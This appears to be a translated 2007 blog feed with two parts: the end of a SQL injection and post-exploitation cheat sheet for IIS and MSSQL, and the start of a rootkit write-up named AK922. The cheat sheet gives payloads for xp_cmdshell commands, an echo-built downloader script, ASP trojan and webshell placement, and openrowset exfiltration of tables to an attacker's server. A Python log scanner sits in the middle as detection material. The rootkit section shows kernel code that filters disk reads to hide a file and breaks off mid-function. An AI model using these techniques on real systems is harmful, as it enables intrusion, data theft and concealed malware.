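    print(find_web_root(["user", "photo"]))    # the constructed tree puts the site at d:\website\www\
```

Against a real server each `xp_dirtree()` call becomes one `insert ... exec master.dbo.xp_dirtree` into a temporary table and each `contains_all` test becomes one boolean request, which is exactly the cost the text's temp/temp1/temp2 procedure pays.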
21. On Windows 2000, elevating the WEB user to SYSTEM privileges (requires administrator rights to run):
c:\>cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll"

cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\windows\system32\idq.dll" "C:\windows\system32\inetsrv\httpext.dll" "C:\windows\system32\inetsrv\httpodbc.dll" "C:\windows\system32\inetsrv\ssinc.dll" "C:\windows\system32\msw3prt.dll" "C:\windows\system32\inetsrv\asp.dll"

Check whether it worked:
c:\>cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps

Microsoft (R) Windows Script Host Version 5.6
Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.
inprocessisapiapps       : (LIST) (6 Items)
"C:\WINNT\system32\idq.dll"
"C:\WINNT\system32\inetsrv\httpext.dll"
"C:\WINNT\system32\inetsrv\httpodbc.dll"
"C:\WINNT\system32\inetsrv\ssinc.dll"
"C:\WINNT\system32\msw3prt.dll"
"c:\winnt\system32\inetsrv\asp.dll"

22. Hiding an ASP trojan:
Create a non-standard directory: mkdir images..\
Copy the ASP trojan into it: copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
Access the trojan over the web: http://ip/images../news.asp?action=login
Delete the non-standard directory: rmdir images..\ /s

23. Remove NTLM authentication from telnet:
;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm';
24. Use echo to write the download script iget.vbs:
(1)echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >c:\iget.vbs

(2)c:\>cscript iget.vbs http://127.0.0.1/asp/dbm6.asp dbm6.asp


25. Manually creating a hidden IIS directory:
• List the local virtual directories: cscript.exe c:\inetpub\AdminScripts\adsutil.vbs enum w3svc/1/root
• Create a kiss directory: mkdir c:\asp\kiss
• Create the kiss virtual directory: cscript.exe c:\inetpub\AdminScripts\mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "kiss","c:\asp\kiss"
• Give the kiss directory execute and write permissions:
cscript.exe c:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/kiss/accesswrite "true" -s:
cscript.exe c:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/kiss/accessexecute "true" -s:
• Or: Cscript c:\inetpub\AdminScripts\adsutil.vbs set /w3svc/1/root/kiss/createprocessasuser false
• Access: http://127.0.0.1/kiss/test.asp

26. Use openrowset() to connect back to the local server for testing:
SELECT a.*
FROM OPENROWSET('SQLOLEDB','127.0.0.1';'sa';'111111',
'SELECT * FROM [dvbbs].[dbo].[dv_admin]') AS a

SELECT * FROM OPENROWSET('SQLOLEDB','127.0.0.1';'sa';'111111',
'SELECT * FROM [dvbbs].[dbo].[dv_admin]')

27. Get the host name:
select convert(int,@@servername)
select @@servername

28. Get the database user name:
http://www.XXXX.com/FullStory.asp?id=1 and 1=convert(int,system_user)--
http://www.19cn.com/showdetail.asp?id=49 and user>0
select user

29. Second method for an ordinary user to obtain a WEBSHELL:
• Pack:
EXEC [master].[dbo].[xp_makecab] 'c:\test.rar','default',1,'d:\cmd.asp'
Unpack (can be used to obtain a webshell):
• EXEC [master].[dbo].[xp_unpackcab] 'C:\test.rar','c:',1, 'n.asp'
• Read the contents of any file (requires dbo rights in master):
EXEC [master].[dbo].[xp_readerrorlog] 1,'c:\cmd.asp'

30. With sa rights and a known web path, back the database up directly into the web path

http://www.XXXX.com/FullStory.asp?id=1;backup database dbname to disk='c:\inetpub\wwwroot\save.db' backs up all the data into the WEB directory, from where the file can be downloaded over HTTP (you first have to know the WEB virtual directory, of course).

• Walk the system's directory structure and analyse the results to find the WEB virtual directory; first create a temporary table temp:
http://www.XXXX.com/FullStory.asp?id=1;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
• Next, use xp_availablemedia to obtain all current drives and store them in temp:
http://www.XXXX.com/FullStory.asp?id=1;insert temp exec master.dbo.xp_availablemedia;--
• Query temp for the drive list and related information, or use xp_subdirs to get the subdirectory list and store it in temp:
http://www.XXXX.com/FullStory.asp?id=1;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--
• xp_dirtree gives the whole subdirectory tree, stored into temp as well:
http://www.XXXX.com/FullStory.asp?id=1;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- which lets you browse the complete list of directories (folders)
• To view the contents of a particular file, run it through xp_cmdshell: ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--
• The 'bulk insert' syntax loads a text file into a temporary table, e.g. bulk insert temp(id) from 'c:\inetpub\wwwroot\index.asp'. Browsing temp then shows the contents of index.asp; by analysing the various ASP files you obtain a great deal of system, WEB and admin information, even the connection password of the SA account.
31. Summary of some SQL Server extended stored procedures:
xp_availablemedia   lists the drive letters available on the system, e.g. 'C:\'   xp_availablemedia
xp_enumgroups   lists the current system's user groups and their descriptions   xp_enumgroups
xp_enumdsn   lists the ODBC data source names configured on the system   xp_enumdsn
xp_dirtree   shows the subdirectory and file structure under a directory   xp_dirtree 'C:\inetpub\wwwroot\'
xp_getfiledetails   gets a file's attributes   xp_getfiledetails 'C:\inetpub\wwwroot.asp'
dbo.xp_makecab   compresses several files on the target machine into one archive; the files to compress follow the parameters, separated by commas   dbo.xp_makecab 'C:\lin.cab','evil',1,'C:\inetpub\mdb.asp'
xp_unpackcab   decompresses an archive   xp_unpackcab 'C:\hackway.cab','C:\temp',1
xp_ntsec_enumdomains   lists the server's domains   xp_ntsec_enumdomains
xp_servicecontrol   stops or starts a service   xp_servicecontrol 'stop','schedule'
xp_terminate_process   kills a running process by pid   xp_terminate_process 123
dbo.xp_subdirs   lists only the subdirectories of a directory   dbo.xp_subdirs 'C:\'
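A detection-side counterpart to the extended stored procedures listed above and to the payload shapes used throughout this post, as an added example (not code from the original): it scans IIS W3C log lines for the xp_* and sp_OA* names, OPENROWSET and linked-server use, BACKUP DATABASE ... TO DISK, the convert(int, ...) probe and item 19's tautologies. The field layout and the sample log lines are constructed, not taken from a real server.

```python
"""Scan IIS W3C log lines for the injection building blocks used in this post (added example)."""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote_plus

# Indicator name -> pattern, matched against the URL-decoded, lower-cased query string
INDICATORS = {
    "xp_cmdshell":    re.compile(r"xp_cmdshell"),
    "sp_oacreate":    re.compile(r"sp_oa(?:create|method|getproperty|setproperty)"),
    "registry_write": re.compile(r"xp_regwrite"),
    "registry_read":  re.compile(r"xp_regread"),
    "filesystem_xp":  re.compile(r"xp_(?:dirtree|subdirs|availablemedia|makecab|unpackcab|readerrorlog|fileexist)"),
    "openrowset":     re.compile(r"openrowset|opendatasource|sp_addlinkedserver|openquery"),
    "backup_to_web":  re.compile(r"backup\s+database\b.*\bto\s+disk"),
    "error_probe":    re.compile(r"convert\s*\(\s*int\s*,\s*(?:@@|db_name|system_user|user\b)"),
    "tautology":      re.compile(r"['\"]\s*or\s*(?:1\s*=\s*1|'[^']*'\s*=\s*'|\"[^\"]*\"\s*=\s*\")"),
    "stacked_query":  re.compile(r";\s*(?:exec|declare|create|insert|update|drop|backup|bulk)\b"),
}

# Constructed sample (assumption): date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2007-10-22 01:41:00 10.0.0.7 GET /display.asp keyno=188 200
2007-10-22 01:41:05 10.0.0.7 GET /display.asp keyno=188+and+1=convert(int,@@version)-- 500
2007-10-22 01:41:09 10.0.0.7 GET /display.asp keyno=1881;exec+master.dbo.xp_cmdshell+'dir+c:\\' 500
2007-10-22 01:41:12 10.0.0.7 GET /display.asp keyno=188;EXEC+master.dbo.xp_regwrite+'HKEY_LOCAL_MACHINE','SOFTWARE\\Microsoft\\Jet\\4.0\\Engines','SandBoxMode','REG_DWORD',1 200
2007-10-22 01:41:20 10.0.0.7 GET /login.asp user=%27+or+1%3D1--&pass=x 302
2007-10-22 01:41:31 10.0.0.7 GET /FullStory.asp id=1;backup+database+dvbbs+to+disk=%27c:\\inetpub\\wwwroot\\save.db%27 200
2007-10-22 01:42:00 192.168.1.20 GET /news/show1.asp NewsId=125272 200
"""

def scan_line(line: str) -> Optional[Dict]:
    """Return {time, ip, uri, status, hits} for a suspicious request, or None for a clean one."""
    parts = line.split()
    if len(parts) < 7:
        return None                           # directive, header or truncated line
    date, time, ip, method, stem, query, status = parts[:7]
    decoded = unquote_plus(query).lower()     # '+' and %XX are how the payloads travel
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    if not hits:
        return None
    return {"time": f"{date} {time}", "ip": ip, "uri": stem, "status": status, "hits": hits}

def scan_log(text: str) -> List[Dict]:
    """Scan every line; lines starting with '#' are W3C directives and are skipped."""
    return [hit for line in text.splitlines()
            if line and not line.startswith("#")
            for hit in [scan_line(line)] if hit]

if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(h["time"], h["ip"], h["uri"], h["status"], ",".join(h["hits"]))
```

The `stacked_query` indicator alone is noisy on real traffic; what makes these requests worth an alert is the pairing of a stacked statement with one of the procedure names, or a 500 status following a convert(int, ...) probe.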

32. A helper procedure, sp_MSforeachObject, that runs a command against every object of one type (usage examples follow the script):
USE MASTER
GO
CREATE proc sp_MSforeachObject
@objectType int=1,
@command1 nvarchar(2000),
@replacechar nchar(1) = N'?',
@command2 nvarchar(2000) = null,
@command3 nvarchar(2000) = null,
@whereand nvarchar(2000) = null,
@precommand nvarchar(2000) = null,
@postcommand nvarchar(2000) = null
as
/* This proc returns one or more rows for each table (optionally, matching @where), with each table defaulting to its
own result set */
/* @precommand and @postcommand may be used to force a single result set via a temp table. */
/* Preprocessor won't replace within quotes so have to use str(). */
declare @mscat nvarchar(12)
select @mscat = ltrim(str(convert(int, 0x0002)))
if (@precommand is not null)
exec(@precommand)
/* Defined @isobject for save object type */
Declare @isobject varchar(256)
select @isobject= case @objectType when 1 then 'IsUserTable'
when 2 then 'IsView'
when 3 then 'IsTrigger'
when 4 then 'IsProcedure'
when 5 then 'IsDefault'
when 6 then 'IsForeignKey'
when 7 then 'IsScalarFunction'
when 8 then 'IsInlineFunction'
when 9 then 'IsPrimaryKey'
when 10 then 'IsExtendedProc'
when 11 then 'IsReplProc'
when 12 then 'IsRule'
    end
/* Create the select */
/* Use @isobject variable instead of IsUserTable string */
EXEC(N'declare hCForEach cursor global for select ''['' + REPLACE(user_name(uid), N'']'', N'']]'') + '']'' + ''.'' + ''['' +
REPLACE(object_name(id), N'']'', N'']]'') + '']'' from dbo.sysobjects o '
+ N' where OBJECTPROPERTY(o.id, N'''+@isobject+''') = 1 '+N' and o.category & ' + @mscat + N' = 0 '
+ @whereand)
declare @retval int
select @retval = @@error
if (@retval = 0)
    exec @retval = sp_MSforeach_worker @command1, @replacechar, @command2, @command3
if (@retval = 0 and @postcommand is not null)
    exec(@postcommand)
return @retval
GO


/*
1. Get the script of every stored procedure:
EXEc sp_MSforeachObject @command1="sp_helptext '?' ",@objectType=4
2. Get the script of every view:
EXEc sp_MSforeachObject @command1="sp_helptext '?' ",@objectType=2

EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=1
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=2
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=3
EXEc sp_MSforeachObject @command1="sp_changeobjectowner '?', 'dbo'",@objectType=4
*/

33. Backing up a database with DB_OWNER rights
Use openrowset. Connect back to your own database machine: first create, locally, a table with the same structure as the target's, using nvarchar for the column types. Then connect to the target's SQL database with a client tool and run, in Query Analyzer:
insert into OPENROWSET ('sqloledb','server=your-db-server-IP;uid=user;pwd=pass;database=dbname;','select * from your-table') select * from target-table
If there is too much data, check whether the database has an auto-numbered column and take it in slices: select * from tablename where id>100
If the database is on the same machine as the WEB server, just BAK the database into the WEB directory and fetch it... provided the database is not too large; above 1 GB SQL Server times out.
With SA rights the two ASP programs below can be used to back up the database:
sqlbackup1.asp
<HTML>
<HEAD>
<TITLE>SQL Server database backup and restore</TITLE>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</HEAD>
<BODY>
<form method="post" name=myform>
Operation: <INPUT TYPE="radio" NAME="act" id="act_backup" value="backup"><label for=act_backup>Backup</label> 
<INPUT TYPE="radio" NAME="act" id="act_restore" value="restore"><label for=act_restore>Restore</label>
<br>Database name: <INPUT TYPE="text" NAME="databasename" value="<%=request("databasename")%>">
<br>File path: <INPUT TYPE="text" NAME="bak_file" value="c:\1.exe">(path of the file to back up to or restore from; backing up under an .exe name just makes it easier to download)<br>
<input type="submit" value="OK">
</form>
<%
dim sqlserver,sqlname,sqlpassword,sqlLoginTimeout,databasename,bak_file,act
sqlserver = "localhost" 'SQL server
sqlname = "sa" 'user name
sqlpassword = "database password" 'password
sqlLoginTimeout = 15 'login timeout
databasename = trim(request("databasename"))
bak_file = trim(request("bak_file"))
bak_file = replace(bak_file,"$1",databasename)
act = lcase(request("act"))
if databasename = "" then
response.write "input database name"
else
if act = "backup" then
Set srv=Server.CreateObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set bak = Server.CreateObject("SQLDMO.Backup")
bak.Database=databasename
bak.Devices=Files
bak.Files=bak_file
bak.SQLBackup srv
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
Response.write "<font color=green>Backup succeeded!</font>"
elseif act = "restore" then
'restore only while no one is using the database!
Set srv=Server.CreateObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set rest=Server.CreateObject("SQLDMO.Restore")
rest.Action=0 ' full db restore
rest.Database=databasename
rest.Devices=Files
rest.Files=bak_file
rest.ReplaceDatabase=True 'Force restore over existing database
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
rest.SQLRestore srv

Response.write "<font color=green>Restore succeeded!</font>"
else
Response.write "<font color=red>No operation selected</font>"
end if
end if
%>
</BODY>
</HTML>

sqlbackup2.asp
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>采飞扬 ASP MSSQL database backup program V1.0--QQ:79998575</title>
</head>
<style>
BODY {   FONT-SIZE: 9pt;   COLOR: #000000;   FONT-FAMILY: "Courier New";   scrollbar-face-color:#E4E4F3;   scrollbar-highlight-color:#FFFFFF;   scrollbar-3dlight-color:#E4E4F3;   scrollbar-darkshadow-color:#9C9CD3;   scrollbar-shadow-color:#E4E4F3;   scrollbar-arrow-color:#4444B3;   scrollbar-track-color:#EFEFEF;}TABLE {   FONT-SIZE: 9pt;   FONT-FAMILY: "Courier New";   BORDER-COLLAPSE: collapse;   border-top-width: 1px;   border-right-width: 1px;   border-bottom-width: 1px;   border-left-width: 1px;   border-top-style: solid;   border-right-style: none;   border-bottom-style: none;   border-left-style: solid;   border-top-color: #d8d8f0;   border-right-color: #d8d8f0;   border-bottom-color: #d8d8f0;   border-left-color: #d8d8f0;}.tr {   font-family: "Courier New";   font-size: 9pt;   background-color: #e4e4f3;   text-align: center;}.td {   font-family: "Courier New";   font-size: 9pt;   background-color: #f9f9fd;}.warningColor {   font-family: "Courier New";   font-size: 9pt;   color: #ff0000;}input {
font-family: "Courier New";
BORDER-TOP-WIDTH: 1px;
BORDER-LEFT-WIDTH: 1px;
FONT-SIZE: 12px;
BORDER-BOTTOM-WIDTH: 1px;
BORDER-RIGHT-WIDTH: 1px;
color: #000000;
}textarea {   font-family: "Courier New";   BORDER-TOP-WIDTH: 1px;   BORDER-LEFT-WIDTH: 1px;   FONT-SIZE: 12px;   BORDER-BOTTOM-WIDTH: 1px;   BORDER-RIGHT-WIDTH: 1px;   color: #000000;}.liuyes {
background-color: #CCCCFF;
}
A:link {   FONT-SIZE: 9pt;   COLOR: #000000;   FONT-FAMILY: "Courier New";   TEXT-DECORATION: none;}tr {   font-family: "Courier New";   font-size: 9pt;   line-height: 18px;}td {   font-family: "Courier New";   font-size: 9pt;   border-top-width: 1px;   border-right-width: 1px;   border-bottom-width: 1px;   border-left-width: 1px;   border-top-style: none;   border-right-style: solid;   border-bottom-style: solid;   border-left-style: none;   border-top-color: #d8d8f0;   border-right-color: #d8d8f0;   border-bottom-color: #d8d8f0;   border-left-color: #d8d8f0;}.trHead {   font-family: "Courier New";   font-size: 9pt;   background-color: #e4e4f3;   line-height: 3px;}.inputLogin {   font-family: "Courier New";   font-size: 9pt;   border: 1px solid #d8d8f0;   background-color: #f9f9fd;   vertical-align: bottom;}</style>
<body>
<form method="post" name="myform" action="?action=backupdatabase">
<table width="686" border="1" align="center">
<tr>
<td width="613" height="30" align="center" bgcolor="#330066"><font color="#FFFFFF">采飞扬 ASP MSSQL database backup program V1.0 </font></td>
</tr>
<tr>
<td>Operation:<br>  <input type="radio" name="act" id="act_backup"value="backup" />
  <label for=act_backup>Backup</label>
  <input type="radio" name="act" id="act_restore" value="restore" />
  <label for=act_restore>Restore</label></td>
</tr>
<tr>
<td><label>SQL server
  <input type="text" name="sqlserver" value="localhost" />
</label></td>
</tr>
<tr>
<td><label>Username
  <input name="sqlname" type="text" value="sa" />
Password
<input type="text" name="sqlpassword" />
</label></td>
</tr>
<tr>
<td><label>Database name:<br>  <input type="text" name="databasename" value="<%=request("databasename")%>" />
</label></td>
</tr>
<tr>
<td>File path:<br>  <input name="bak_file" type="text" value="<% =server.MapPath("\")&"\"&"liuyes.bak"%>" size="60" />
(path of the file to back up to or restore from)</td>
</tr>
<tr>
<td><% Response.write "Absolute path of this file:" %>
  <font color="#FF0000">
  <% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>
  </font></td>
</tr>
<tr>
<td><input name="submit1" type="submit" class="liuyes" id="submit1" size="10" value="OK" />
    <input name="Submit" type="reset" class="liuyes" size="10" value="Reset" /></td>
</tr>
</table>
</form>
<table width="686" border="1" align="center">
<tr>
<td>Status:<%
if request("action")="" then
response.write "<font color=#ff0000>Nothing more needs to be said, right?</font>"
end if
'Backup and restore of a SQL Server database
if request("action")="backupdatabase" Then
On Error Resume Next    'needed so that err.number can be inspected after each SQLDMO call
dim sqlserver,sqlname,sqlpassword,sqlLoginTimeout,databasename,bak_file,act
sqlserver = trim(request("sqlserver"))
sqlname = trim(request("sqlname"))
sqlpassword =trim(request("sqlpassword"))
sqlLoginTimeout = 15
databasename = trim(request("databasename"))
bak_file = trim(request("bak_file"))
bak_file = replace(bak_file,"$1",databasename)
act = lcase(request("act"))
if databasename = "" then
response.write "<font color=#ff0000>No database name was entered!</font>"
else
if act = "backup" then
Set srv=Server.CreateObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set bak = Server.CreateObject("SQLDMO.Backup")
bak.Database=databasename
bak.Devices=Files
bak.Action   = 0
bak.Initialize   = 1
'bak.Replace   = True
bak.Files=bak_file
bak.SQLBackup srv
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
else
Response.write "<font color=green>Backup succeeded!</font>"
end if
elseif act="restore" then
'A restore must be performed while the database is not in use!
Set srv=Server.CreateObject("SQLDMO.SQLServer")
srv.LoginTimeout = sqlLoginTimeout
srv.Connect sqlserver,sqlname, sqlpassword
Set rest=Server.CreateObject("SQLDMO.Restore")
rest.Action=0 ' full db restore
rest.Database=databasename
rest.Devices=Files
rest.Files=bak_file
rest.ReplaceDatabase=True 'Force restore over existing database
rest.SQLRestore srv
'check for errors only after the restore has actually been attempted
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
else
Response.write "<font color=green>Restore succeeded!</font>"
end if
else
Response.write "<font color=red>Please select backup or restore!</font>"
end if
end if
end if
%></td>
</tr>
</table>
</body>
</html>

 



叶子 2007-10-22 09:41 Post a comment
]]>
AK922: Bypassing disk low-level scanning to implement file hiding</title><link>http://www.shnenglu.com/elva/archive/2007/10/12/34018.html</link><dc:creator>叶子</dc:creator><author>叶子</author><pubDate>Fri, 12 Oct 2007 03:58:00 GMT</pubDate><guid>http://www.shnenglu.com/elva/archive/2007/10/12/34018.html</guid><wfw:comment>http://www.shnenglu.com/elva/comments/34018.html</wfw:comment><comments>http://www.shnenglu.com/elva/archive/2007/10/12/34018.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.shnenglu.com/elva/comments/commentRss/34018.html</wfw:commentRss><trackback:ping>http://www.shnenglu.com/elva/services/trackbacks/34018.html</trackback:ping><description><![CDATA[AK922: Bypassing disk low-level scanning to implement file hiding
Author: Azy
email: Azy000@gmail.com
Completed: 2007-08-08

   At present, the mainstream public anti-rootkit tools detect hidden files in two main ways. The first is detection at the file-system layer; IceSword, DarkSpy, GMER and others belong to this class. The second is low-level detection at the disk level (Disk Low-Level Scanning); many ARKs belong to this class as well, typical examples being Rootkit Unhooker, FileReg (an IceSword plugin), RootkitRevealer, BlackLight and so on. There are of course also tools that perform the check in user mode by calling ZwQueryDirectoryFile.
   Driver or application, put plainly it all comes down to sending IRPs, directly or indirectly, to a lower-level driver. The first class is sent to the FSD (fastfat.sys/ntfs.sys), the second to the disk driver (disk.sys); the IRP then comes back carrying the corresponding file information, and the upper-level application processes and judges based on what was returned. Because the disk level lies below the FS level, the IRP hands us disk sector data that is much closer to the raw organization of the data, so file detection done at the disk layer yields more convincing results. That does not mean this kind of detection cannot be defeated, though. This article describes one way of getting around it, which is of course also the way used in AK922.
   For an RK that wants to hide files, it is less a matter of "bypassing" than of "intercepting": hooking certain kernel function calls so that, before the data is returned to the upper layer, we get a chance to filter out the information about the file to be hidden.
   The method AK922 uses is to hook the kernel function IofCompleteRequest. This function is interesting: not only is it called by almost every driver, its parameters happen to include the IRP, and with the IRP we have everything. These properties make it well suited to be our "puppet". More importantly, by the time a driver calls IofCompleteRequest the IRP operation is normally already complete and the relevant fields of the IRP have been filled in, so we can set about filtering directly without having to do things like send an IRP of our own and install a completion routine.
   The workflow in more detail:
   First, check whether MajorFunction is IRP_MJ_READ and whether the DeviceObject in the I/O stack location is the disk driver's device object, because that is the core IRP we want to handle; every IRP that an ARK sends directly to the disk layer can be intercepted here.
   The next step needs special care. On entry here the IRQL is above APC_LEVEL, so we cannot touch any user-mode buffer in the IRP; touching one will very likely bluescreen. That means we cannot process the disk sector data directly and must instead queue a work item with ExQueueWorkItem to do it. Besides that, because the disk layer sits low in the device stack, by the time most IRPs arrive here the current process context is no longer that of the original IRP issuer (the issuer here meaning the ARK process). Fortunately the IRP's Tail.Overlay.Thread field still holds the original ETHREAD pointer; to operate on the user-mode buffer we must call KeAttachProcess to switch into the IRP issuer's context, and that can only be done in a worker thread running at PASSIVE_LEVEL. At DISPATCH_LEVEL, the less you do the better.
   At first I handled two cases separately, since not every IRP is out of its original context: an IRP sent by IceSword, for example, is still in the icesword.exe process when it arrives here, and I thought that in that case queuing could be skipped, saving a lot of system resources and making filtering more efficient. So I tried operating on the user buffer directly at DISPATCH_LEVEL, but that does not work; the driver was very unstable and bluescreened before long. So I gave up and simply queue in every case, then split the cases afterwards. The code follows:

// Handle Disk Low-Level Scanning
if(irpSp->MajorFunction == IRP_MJ_READ && IsDiskDrxDevice(irpSp->DeviceObject) && irpSp->Parameters.Read.Length != 0)
{
    orgnThread = Irp->Tail.Overlay.Thread;
    orgnProcess = IoThreadToProcess(orgnThread);

    if(Irp->MdlAddress)
    {
        UserBuffer = (PVOID)((ULONG)Irp->MdlAddress->StartVa + Irp->MdlAddress->ByteOffset);

        // UserBuffer must be valid
        if(UserBuffer)
        {
            if(KeGetCurrentIrql() == DISPATCH_LEVEL)
            {
                RtlZeroMemory(WorkerCtx, sizeof(WORKERCTX));

                WorkerCtx->UserBuffer = UserBuffer;
                WorkerCtx->Length = irpSp->Parameters.Read.Length;
                WorkerCtx->EProc = orgnProcess;

                ExInitializeWorkItem(&WorkerCtx->WorkItem, WorkerThread, WorkerCtx);

                ExQueueWorkItem(&WorkerCtx->WorkItem, CriticalWorkQueue);
            }
        }
    }
}

   In the worker thread, at PASSIVE_LEVEL and after switching context, things look much safer. Just in case, though, a ProbeForXxx function is still called to check the user-mode buffer before operating on it. The relevant code:

VOID WorkerThread(PVOID Context)
{
    KIRQL irql;
    PEPROCESS eproc = ((PWORKERCTX)Context)->orgnEProc;
    PEPROCESS currProc = ((PWORKERCTX)Context)->currEProc;
    //PMDL mdl;

    if(((PWORKERCTX)Context)->UserBuffer)
    {
        if(eproc != currProc)
        {
            KeAttachProcess(eproc);

            __try{
                // ProbeForWrite must be running <= APC_LEVEL
                ProbeForWrite(((PWORKERCTX)Context)->UserBuffer, ((PWORKERCTX)Context)->Length, 1);
                HandleAkDiskHide(((PWORKERCTX)Context)->UserBuffer, ((PWORKERCTX)Context)->Length);
            }
            __except(EXCEPTION_EXECUTE_HANDLER){
                //DbgPrint("we can't op the buffer now :-(");
                KeDetachProcess();
                return;
            }

            KeDetachProcess();

        }else{

            __try{
                // ProbeForWrite must be running <= APC_LEVEL
                ProbeForWrite(((PWORKERCTX)Context)->UserBuffer, ((PWORKERCTX)Context)->Length, 1);
                HandleAkDiskHide(((PWORKERCTX)Context)->UserBuffer, ((PWORKERCTX)Context)->Length);
            }
            __except(EXCEPTION_EXECUTE_HANDLER){}
        }
    }
}

   With the preparation essentially done, the real editing of disk sector contents begins. This involves the FAT32 and NTFS on-disk file structures; the main structures used are listed below, the rest can be found in "NTFS Documentation".

typedef struct _INDEX_HEADER{
    UCHAR            magic[4];
    USHORT           UpdateSequenceOffset;
    USHORT           SizeInWords;
    LARGE_INTEGER    LogFileSeqNumber;
    LARGE_INTEGER    VCN;
    ULONG            IndexEntryOffset;    // needed!
    ULONG            IndexEntrySize;
    ULONG            AllocateSize;
}INDEX_HEADER, *PINDEX_HEADER;

typedef struct _INDEX_ENTRY{
    LARGE_INTEGER    MFTReference;
    USHORT           Size;                // needed!
    USHORT           FileNameOffset;
    USHORT           Flags;
    USHORT           Padding;
    LARGE_INTEGER    MFTReferParent;
    LARGE_INTEGER    CreationTime;
    LARGE_INTEGER    ModifyTime;
    LARGE_INTEGER    FileRecModifyTime;
    LARGE_INTEGER    AccessTime;
    LARGE_INTEGER    AllocateSize;
    LARGE_INTEGER    RealSize;
    LARGE_INTEGER    FileFlags;
    UCHAR            FileNameLength;
    UCHAR            NameSpace;
    WCHAR            FileName[1];
}INDEX_ENTRY, *PINDEX_ENTRY;

   Disk file information is always read in multiples of one sector (512 bytes). Without knowing the volume's organization and data structures, the data looks large and messy and searching is inefficient; with the structures above, the file to be hidden can be located quickly and altered. It must be said that algorithmic efficiency matters a great deal here: a brute-force search greatly raises the probability of a system BSOD.
   On a FAT32 volume, when AK922 finds the directory entry of the file AK922.sys, it sets the first byte of the file name at offset 0x0 to 0xe5, marking the entry as deleted. That is enough to fool the ARK, but to be stealthier and not stand out in WinHex it is better to zero the whole file name.
   Handling an NTFS volume is a little more troublesome: both the file record and the index entry have to be wiped. See the code for the details; they are not repeated here.

VOID HandleAkDiskHide(PVOID UserBuf, ULONG BufLen)
{
    ULONG i;
    BOOLEAN bIsNtfsIndex;
    BOOLEAN bIsNtfsFile;
    ULONG offset = 0;
    ULONG indexSize = 0;
    PINDEX_ENTRY currIndxEntry = NULL;
    PINDEX_ENTRY preIndxEntry = NULL;
    ULONG currPosition;

    bIsNtfsFile = (_strnicmp(UserBuf, NtfsFileRecordHeader, 4) == 0);
    bIsNtfsIndex = (_strnicmp(UserBuf, NtfsIndexRootHeader, 4) == 0);

    if(bIsNtfsFile == FALSE && bIsNtfsIndex == FALSE)
    {
        for(i = 0; i < BufLen/0x20; i++)
        {
            if(!_strnicmp(UserBuf, fileHide, 5) && !_strnicmp((PVOID)((ULONG)UserBuf+0x8), fileExt, 3))
            {
                *(PUCHAR)UserBuf        = 0xe5;
                *(PULONG)((ULONG)UserBuf + 0x1)    = 0;

                break;
            }

            UserBuf = (PVOID)((ULONG)UserBuf + 0x20);
        }

    } else if(bIsNtfsFile) {

        //DbgPrint("FILE0...");

        for(i = 0; i < BufLen / FILERECORDSIZE; i++)
        {
            if(!_wcsnicmp((PWCHAR)((ULONG)UserBuf + 0xf2), hideFile, 9))
            {
                memset((PVOID)UserBuf, 0, 0x4);
                memset((PVOID)((ULONG)UserBuf + 0xf2), 0, 18);
                break;
            }

            UserBuf = (PVOID)((ULONG)UserBuf + FILERECORDSIZE);
        }

    } else if(bIsNtfsIndex) {

        //DbgPrint("INDX...");
        // Index Entries

        offset = ((PINDEX_HEADER)UserBuf)->IndexEntryOffset + 0x18;
        indexSize = BufLen - offset;
        currPosition = 0;

